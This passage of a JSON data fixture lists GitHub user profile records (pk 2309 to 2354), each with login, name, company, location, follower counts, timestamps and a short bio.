"https://avatars.githubusercontent.com/u/117395141?v=4", + "company": "VivSoft - BatCave Infra and Zero Trust", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2022-11-03T19:50:01Z", + "updated_at": "2024-08-17T20:01:54Z", + "node_id": "U_kgDOBv9OxQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2309, + "fields": { + "nest_created_at": "2024-09-12T01:14:42.440Z", + "nest_updated_at": "2024-09-12T01:14:42.440Z", + "name": "", + "login": "borovskimateusz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108801111?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-07-06T10:28:28Z", + "updated_at": "2024-04-29T07:27:32Z", + "node_id": "U_kgDOBnwsVw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2310, + "fields": { + "nest_created_at": "2024-09-12T01:14:43.752Z", + "nest_updated_at": "2024-09-12T01:14:43.752Z", + "name": "", + "login": "AlBellom", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92964768?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-10-22T02:53:31Z", + "updated_at": "2024-05-30T14:13:15Z", + "node_id": "U_kgDOBYqHoA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2311, + "fields": { + "nest_created_at": "2024-09-12T01:14:46.274Z", + "nest_updated_at": "2024-09-22T19:35:37.498Z", + "name": "Camilo Cota", + "login": "ccronca", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1499184?v=4", + "company": "Red Hat", + "location": "Droga Mleczna", + "collaborators_count": 0, + "following_count": 34, + "followers_count": 19, + "public_gists_count": 5, + "public_repositories_count": 317, + "created_at": "2012-03-04T11:09:58Z", + "updated_at": "2024-07-11T14:19:23Z", + "node_id": "MDQ6VXNlcjE0OTkxODQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2312, + "fields": { + "nest_created_at": "2024-09-12T01:14:47.525Z", + "nest_updated_at": "2024-09-16T22:27:01.706Z", + "name": "", + "login": "ArsArmandi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66745241?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-06-10T17:28:58Z", + "updated_at": "2024-09-14T21:35:45Z", + "node_id": "MDQ6VXNlcjY2NzQ1MjQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2313, + "fields": { + "nest_created_at": "2024-09-12T01:14:50.201Z", + "nest_updated_at": "2024-09-12T01:14:50.201Z", + "name": "Spencer Ho", + "login": "revaspeho", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83427905?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-04-29T19:51:48Z", + "updated_at": "2024-09-03T21:02:56Z", + "node_id": "MDQ6VXNlcjgzNDI3OTA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2314, + "fields": { + "nest_created_at": "2024-09-12T01:14:51.477Z", + "nest_updated_at": "2024-09-12T01:14:51.477Z", + "name": "Raph LALAN", + "login": "Raphaaaaaugh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118915139?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-11-23T15:04:52Z", + "updated_at": "2024-07-14T20:36:16Z", + "node_id": "U_kgDOBxaAQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2315, + "fields": { + "nest_created_at": "2024-09-12T01:14:52.849Z", + "nest_updated_at": "2024-09-12T01:14:52.849Z", + "name": "", + "login": "alexander-p2p", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96881780?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-12-30T16:28:44Z", + "updated_at": "2024-08-13T14:08:11Z", + "node_id": "U_kgDOBcZMdA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2316, + "fields": { + "nest_created_at": "2024-09-12T01:14:54.141Z", + "nest_updated_at": "2024-09-12T01:15:40.237Z", + "name": "felipe", + "login": "johnfelipe", + "email": "ingenierofelipeurrego@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/428820?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1955, + "followers_count": 120, + "public_gists_count": 249, + "public_repositories_count": 1454, + "created_at": "2010-10-05T23:11:12Z", + "updated_at": "2024-07-18T14:14:38Z", + "node_id": "MDQ6VXNlcjQyODgyMA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2317, + "fields": { + "nest_created_at": "2024-09-12T01:14:55.420Z", + "nest_updated_at": "2024-09-12T01:14:55.420Z", + "name": "", + "login": "Nafanyya", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/164300555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-03-21T04:57:43Z", + "updated_at": "2024-09-04T10:11:39Z", + "node_id": "U_kgDOCcsHCw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2318, + "fields": { + "nest_created_at": "2024-09-12T01:14:57.986Z", + "nest_updated_at": "2024-09-12T01:14:57.986Z", + "name": "", + "login": "Muhammad-Irtaza", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64648269?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-05-01T14:18:53Z", + "updated_at": "2024-03-26T14:50:09Z", + "node_id": "MDQ6VXNlcjY0NjQ4MjY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2319, + "fields": { + "nest_created_at": "2024-09-12T01:14:59.243Z", + "nest_updated_at": "2024-09-12T01:14:59.243Z", + "name": "", + "login": "6d69636861656c", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/169082156?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-06T17:08:25Z", + "updated_at": "2024-08-22T21:16:51Z", + "node_id": "U_kgDOChP9LA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2320, + "fields": { + "nest_created_at": "2024-09-12T01:15:01.375Z", + "nest_updated_at": "2024-09-12T01:15:01.375Z", + "name": "", + "login": "G1P0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119890983?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-12-05T19:12:06Z", + "updated_at": "2024-08-23T15:14:47Z", + "node_id": "U_kgDOByVkJw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2321, + "fields": { + "nest_created_at": "2024-09-12T01:15:03.898Z", + "nest_updated_at": "2024-09-12T01:16:04.045Z", + "name": "", + "login": "Halogenmake", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118000064?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-11-11T14:36:22Z", + "updated_at": "2024-09-10T14:39:37Z", + "node_id": "U_kgDOBwiJwA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2322, + "fields": { + "nest_created_at": "2024-09-12T01:15:05.462Z", + "nest_updated_at": "2024-09-12T01:15:05.462Z", + "name": "Kaan Atmaca", + "login": "kaanatmacaa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57772940?v=4", + "company": "", + "location": "Istanbul", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 47, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2019-11-14T20:12:27Z", + "updated_at": "2024-08-02T06:43:43Z", + "node_id": "MDQ6VXNlcjU3NzcyOTQw", + "bio": "Penetration Tester", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2323, + "fields": { + "nest_created_at": "2024-09-12T01:15:08.004Z", + "nest_updated_at": "2024-09-22T19:36:12.323Z", + "name": "", + "login": "barucijah", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22957660?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2016-10-20T11:22:03Z", + "updated_at": "2024-09-12T10:25:53Z", + "node_id": "MDQ6VXNlcjIyOTU3NjYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2324, + "fields": { + "nest_created_at": "2024-09-12T01:15:09.288Z", + "nest_updated_at": "2024-09-12T01:15:09.288Z", + "name": "", + "login": "Wakramshaik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/169911735?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-15T13:23:55Z", + "updated_at": "2024-05-15T13:24:26Z", + "node_id": "U_kgDOCiCltw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2325, + "fields": { + "nest_created_at": "2024-09-12T01:15:10.631Z", + "nest_updated_at": "2024-09-12T01:15:10.631Z", + "name": "", + "login": "macsoun", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52595681?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-07-06T08:24:06Z", + "updated_at": "2024-05-15T12:01:35Z", + "node_id": "MDQ6VXNlcjUyNTk1Njgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2326, + "fields": { + "nest_created_at": "2024-09-12T01:15:16.951Z", + "nest_updated_at": "2024-09-22T19:35:13.534Z", + "name": "", + "login": "MarianG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1209742?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2011-11-21T08:24:21Z", + "updated_at": "2024-07-01T11:41:15Z", + "node_id": "MDQ6VXNlcjEyMDk3NDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2327, + "fields": { + "nest_created_at": "2024-09-12T01:15:18.222Z", + "nest_updated_at": "2024-09-12T01:15:18.222Z", + "name": "K0mand1r", + "login": "k0mand1r", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13031028?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2015-06-24T09:26:03Z", + "updated_at": "2024-05-22T07:57:03Z", + "node_id": "MDQ6VXNlcjEzMDMxMDI4", + "bio": "Python programmer, Infosec guy", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2328, + "fields": { + "nest_created_at": "2024-09-12T01:15:20.800Z", + "nest_updated_at": "2024-09-12T01:15:20.800Z", + "name": "Maximilian Waidelich", + "login": "maxwai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44324946?v=4", + "company": "LRE Medical", + "location": "Munich, Germany", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-10-20T18:06:13Z", + "updated_at": "2024-08-26T08:06:34Z", + "node_id": "MDQ6VXNlcjQ0MzI0OTQ2", + "bio": "", + "is_hireable": false, + "twitter_username": "MaximilianWaide" + } +}, +{ + "model": "github.user", + "pk": 2329, + "fields": { + "nest_created_at": "2024-09-12T01:15:22.022Z", + "nest_updated_at": "2024-09-12T01:15:22.022Z", + "name": "Brieuc Renaudin", + "login": "brieucR", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108789960?v=4", + "company": "@BackMarket ", + "location": "", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-07-06T07:25:43Z", + "updated_at": "2024-08-14T14:02:14Z", + "node_id": "U_kgDOBnwAyA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2330, + "fields": { + "nest_created_at": "2024-09-12T01:15:23.278Z", + "nest_updated_at": "2024-09-12T01:15:25.799Z", + "name": "Rahul Mahulkar", + "login": "iamrahul127", + "email": "iamrahul127@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24877322?v=4", + "company": "Tieto India", + "location": "Pune, India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-01-02T14:45:01Z", + "updated_at": "2024-06-11T05:42:18Z", + "node_id": "MDQ6VXNlcjI0ODc3MzIy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2331, + "fields": { + "nest_created_at": "2024-09-12T01:15:24.517Z", + "nest_updated_at": "2024-09-22T19:34:25.708Z", + "name": "", + "login": "GraoMelo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60477737?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 83, + "created_at": "2020-01-30T15:33:29Z", + "updated_at": "2024-08-23T13:07:22Z", + "node_id": "MDQ6VXNlcjYwNDc3NzM3", + "bio": "Blockchain evangelist.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2332, + "fields": { + "nest_created_at": "2024-09-12T01:15:27.056Z", + "nest_updated_at": "2024-09-16T22:27:02.704Z", + "name": "", + "login": "navzen2000", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17735867?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-03-09T03:25:55Z", + "updated_at": "2024-09-12T07:02:26Z", + "node_id": "MDQ6VXNlcjE3NzM1ODY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2333, + "fields": { + "nest_created_at": "2024-09-12T01:15:27.894Z", + "nest_updated_at": "2024-09-12T01:15:37.322Z", + "name": "Krish", + "login": "Nsai1997", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46392529?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-01-05T06:06:34Z", + "updated_at": "2024-06-10T09:54:47Z", + "node_id": "MDQ6VXNlcjQ2MzkyNTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2334, + "fields": { + "nest_created_at": "2024-09-12T01:15:34.255Z", + "nest_updated_at": "2024-09-12T01:15:34.255Z", + "name": "Timofey Tsvetkov", + "login": "akiracrying", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78951084?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2021-02-12T07:22:00Z", + "updated_at": "2024-07-29T17:17:49Z", + "node_id": "MDQ6VXNlcjc4OTUxMDg0", + "bio": "// they spy on us \r\n// cybersecurity", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2335, + "fields": { + "nest_created_at": "2024-09-12T01:15:35.511Z", + "nest_updated_at": "2024-09-12T01:15:35.511Z", + "name": "Dkryptur", + "login": "J1nchur1k1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53573052?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-08-01T14:51:09Z", + "updated_at": "2024-06-27T05:57:15Z", + "node_id": "MDQ6VXNlcjUzNTczMDUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2336, + "fields": { + "nest_created_at": "2024-09-12T01:15:36.313Z", + "nest_updated_at": "2024-09-12T01:15:36.313Z", + "name": "", + "login": "esrabayramova", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59417568?v=4", + "company": "Baku Higher Oil School", + "location": "Sumgayit, Azerbaijan", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2020-01-01T17:06:35Z", + "updated_at": "2024-08-10T07:15:47Z", + "node_id": "MDQ6VXNlcjU5NDE3NTY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2337, + "fields": { + "nest_created_at": "2024-09-12T01:15:41.564Z", + "nest_updated_at": "2024-09-12T01:15:41.564Z", + "name": "", + "login": "MotiejusK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11046392?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-02-17T15:24:44Z", + "updated_at": "2024-02-25T11:59:23Z", + "node_id": "MDQ6VXNlcjExMDQ2Mzky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2338, + "fields": { + "nest_created_at": "2024-09-12T01:15:46.751Z", + "nest_updated_at": "2024-09-12T01:15:46.751Z", + "name": "", + "login": "R00G3R", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72633075?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-10-09T22:47:37Z", + "updated_at": "2024-06-13T13:08:39Z", + "node_id": "MDQ6VXNlcjcyNjMzMDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2339, + "fields": { + "nest_created_at": "2024-09-12T01:15:47.598Z", + "nest_updated_at": "2024-09-12T01:15:47.598Z", + "name": "John Cleve", + "login": "jcleve", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3017379?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2012-12-11T15:13:38Z", + "updated_at": "2024-09-05T14:27:42Z", + "node_id": "MDQ6VXNlcjMwMTczNzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2340, + "fields": { + "nest_created_at": "2024-09-12T01:15:48.849Z", + "nest_updated_at": "2024-09-12T01:15:48.849Z", + "name": "", + "login": "mnunzio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81348966?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2021-03-25T06:41:18Z", + "updated_at": "2024-07-21T05:00:29Z", + "node_id": "MDQ6VXNlcjgxMzQ4OTY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2341, + "fields": { + "nest_created_at": "2024-09-12T01:15:51.322Z", + "nest_updated_at": "2024-09-12T01:15:51.322Z", + "name": "Asutosh kumar rana", + "login": "ashu-tosh99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71056834?v=4", + "company": "GLOBBUSOFT", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2020-09-10T03:59:58Z", + "updated_at": "2024-08-01T03:35:37Z", + "node_id": "MDQ6VXNlcjcxMDU2ODM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2342, + "fields": { + "nest_created_at": "2024-09-12T01:15:52.577Z", + "nest_updated_at": "2024-09-12T01:15:52.577Z", + "name": "", + "login": "dchan14", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5563676?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2013-09-28T10:53:07Z", + "updated_at": "2024-06-17T10:37:12Z", + "node_id": "MDQ6VXNlcjU1NjM2NzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2343, + "fields": { + "nest_created_at": "2024-09-12T01:15:57.991Z", + "nest_updated_at": "2024-09-12T01:15:57.991Z", + "name": "", + "login": "c3r63ru5", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13238344?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2015-07-08T13:46:32Z", + "updated_at": "2024-07-26T09:40:03Z", + "node_id": "MDQ6VXNlcjEzMjM4MzQ0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2344, + "fields": { + "nest_created_at": "2024-09-12T01:15:59.302Z", + "nest_updated_at": "2024-09-12T01:15:59.302Z", + "name": "", + "login": "ptitkosmos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20866643?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-08-05T21:41:52Z", + "updated_at": "2024-08-08T09:49:03Z", + "node_id": "MDQ6VXNlcjIwODY2NjQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2345, + "fields": { + "nest_created_at": "2024-09-12T01:16:00.551Z", + "nest_updated_at": "2024-09-12T01:16:00.551Z", + "name": "Inferno_geek", + "login": "Infernogeek1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36582674?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2018-02-18T04:43:01Z", + "updated_at": "2024-08-12T16:28:21Z", + "node_id": "MDQ6VXNlcjM2NTgyNjc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2346, + "fields": { + "nest_created_at": "2024-09-12T01:16:04.897Z", + "nest_updated_at": "2024-09-12T01:16:04.897Z", + "name": "Jean-Yves NOLEN", + "login": "jynolen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1485801?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 3, + "public_repositories_count": 22, + "created_at": "2012-02-29T16:53:56Z", + "updated_at": "2024-08-16T16:33:36Z", + "node_id": "MDQ6VXNlcjE0ODU4MDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2347, + "fields": { + "nest_created_at": "2024-09-12T01:16:06.184Z", + "nest_updated_at": "2024-09-12T01:16:06.184Z", + "name": "", + "login": "nareshbogathi", + "email": "nareshbogathi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22889650?v=4", + "company": "Capgemini", + "location": "Amsterdam", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2016-10-17T14:01:10Z", + "updated_at": "2023-04-04T16:03:32Z", + "node_id": "MDQ6VXNlcjIyODg5NjUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2348, + "fields": { + "nest_created_at": "2024-09-12T01:16:07.498Z", + "nest_updated_at": "2024-09-22T19:35:27.888Z", + "name": "Marius", + "login": "gietschess", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49275246?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-04-04T11:23:50Z", + "updated_at": "2024-07-26T08:23:54Z", + "node_id": "MDQ6VXNlcjQ5Mjc1MjQ2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2349, + "fields": { + "nest_created_at": "2024-09-12T01:16:08.746Z", + "nest_updated_at": "2024-09-12T01:16:08.746Z", + "name": "", + "login": "andrew-myer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10202735?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2014-12-16T01:59:15Z", + "updated_at": "2024-09-11T20:36:32Z", + "node_id": "MDQ6VXNlcjEwMjAyNzM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2350, + "fields": { + "nest_created_at": "2024-09-12T01:16:10.012Z", + "nest_updated_at": "2024-09-12T01:16:10.012Z", + "name": "", + "login": "CyberAbwehr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51229037?v=4", + "company": "SBA Research", + "location": "Vienna", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-05-31T08:30:29Z", + "updated_at": "2024-04-23T12:47:31Z", + "node_id": "MDQ6VXNlcjUxMjI5MDM3", + "bio": "I love to support open source security projects. ;-)", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2351, + "fields": { + "nest_created_at": "2024-09-12T01:16:11.263Z", + "nest_updated_at": "2024-09-13T05:10:14.414Z", + "name": "lfama", + "login": "lfama", + "email": "luca.p.fama@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14056990?v=4", + "company": "", + "location": "127.1", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2015-08-31T14:57:39Z", + "updated_at": "2024-08-21T10:04:29Z", + "node_id": "MDQ6VXNlcjE0MDU2OTkw", + "bio": "“so’ stato ricco, e non l’ho saputo”", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2352, + "fields": { + "nest_created_at": "2024-09-12T01:16:12.514Z", + "nest_updated_at": "2024-09-20T18:25:39.272Z", + "name": "benamar", + "login": "benamar19", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10367262?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-01-01T22:49:31Z", + "updated_at": "2024-07-16T16:17:48Z", + "node_id": "MDQ6VXNlcjEwMzY3MjYy", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2353, + "fields": { + "nest_created_at": "2024-09-12T01:18:37.799Z", + "nest_updated_at": "2024-09-22T19:38:38.221Z", + "name": "Greg Anderson", + "login": "devGregA", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4741312?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 33, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2013-06-19T18:49:00Z", + "updated_at": "2024-07-22T02:20:01Z", + "node_id": "MDQ6VXNlcjQ3NDEzMTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2354, + "fields": { + "nest_created_at": "2024-09-12T01:18:54.273Z", + "nest_updated_at": "2024-09-22T19:35:01.880Z", + "name": "Jay Paz", + "login": "grendel513", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/233694?v=4", + "company": "DefectDojo, Inc.", + "location": "Austin, TX", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2010-03-30T21:36:21Z", + "updated_at": "2024-09-03T22:56:59Z", + "node_id": "MDQ6VXNlcjIzMzY5NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2355, + "fields": { + 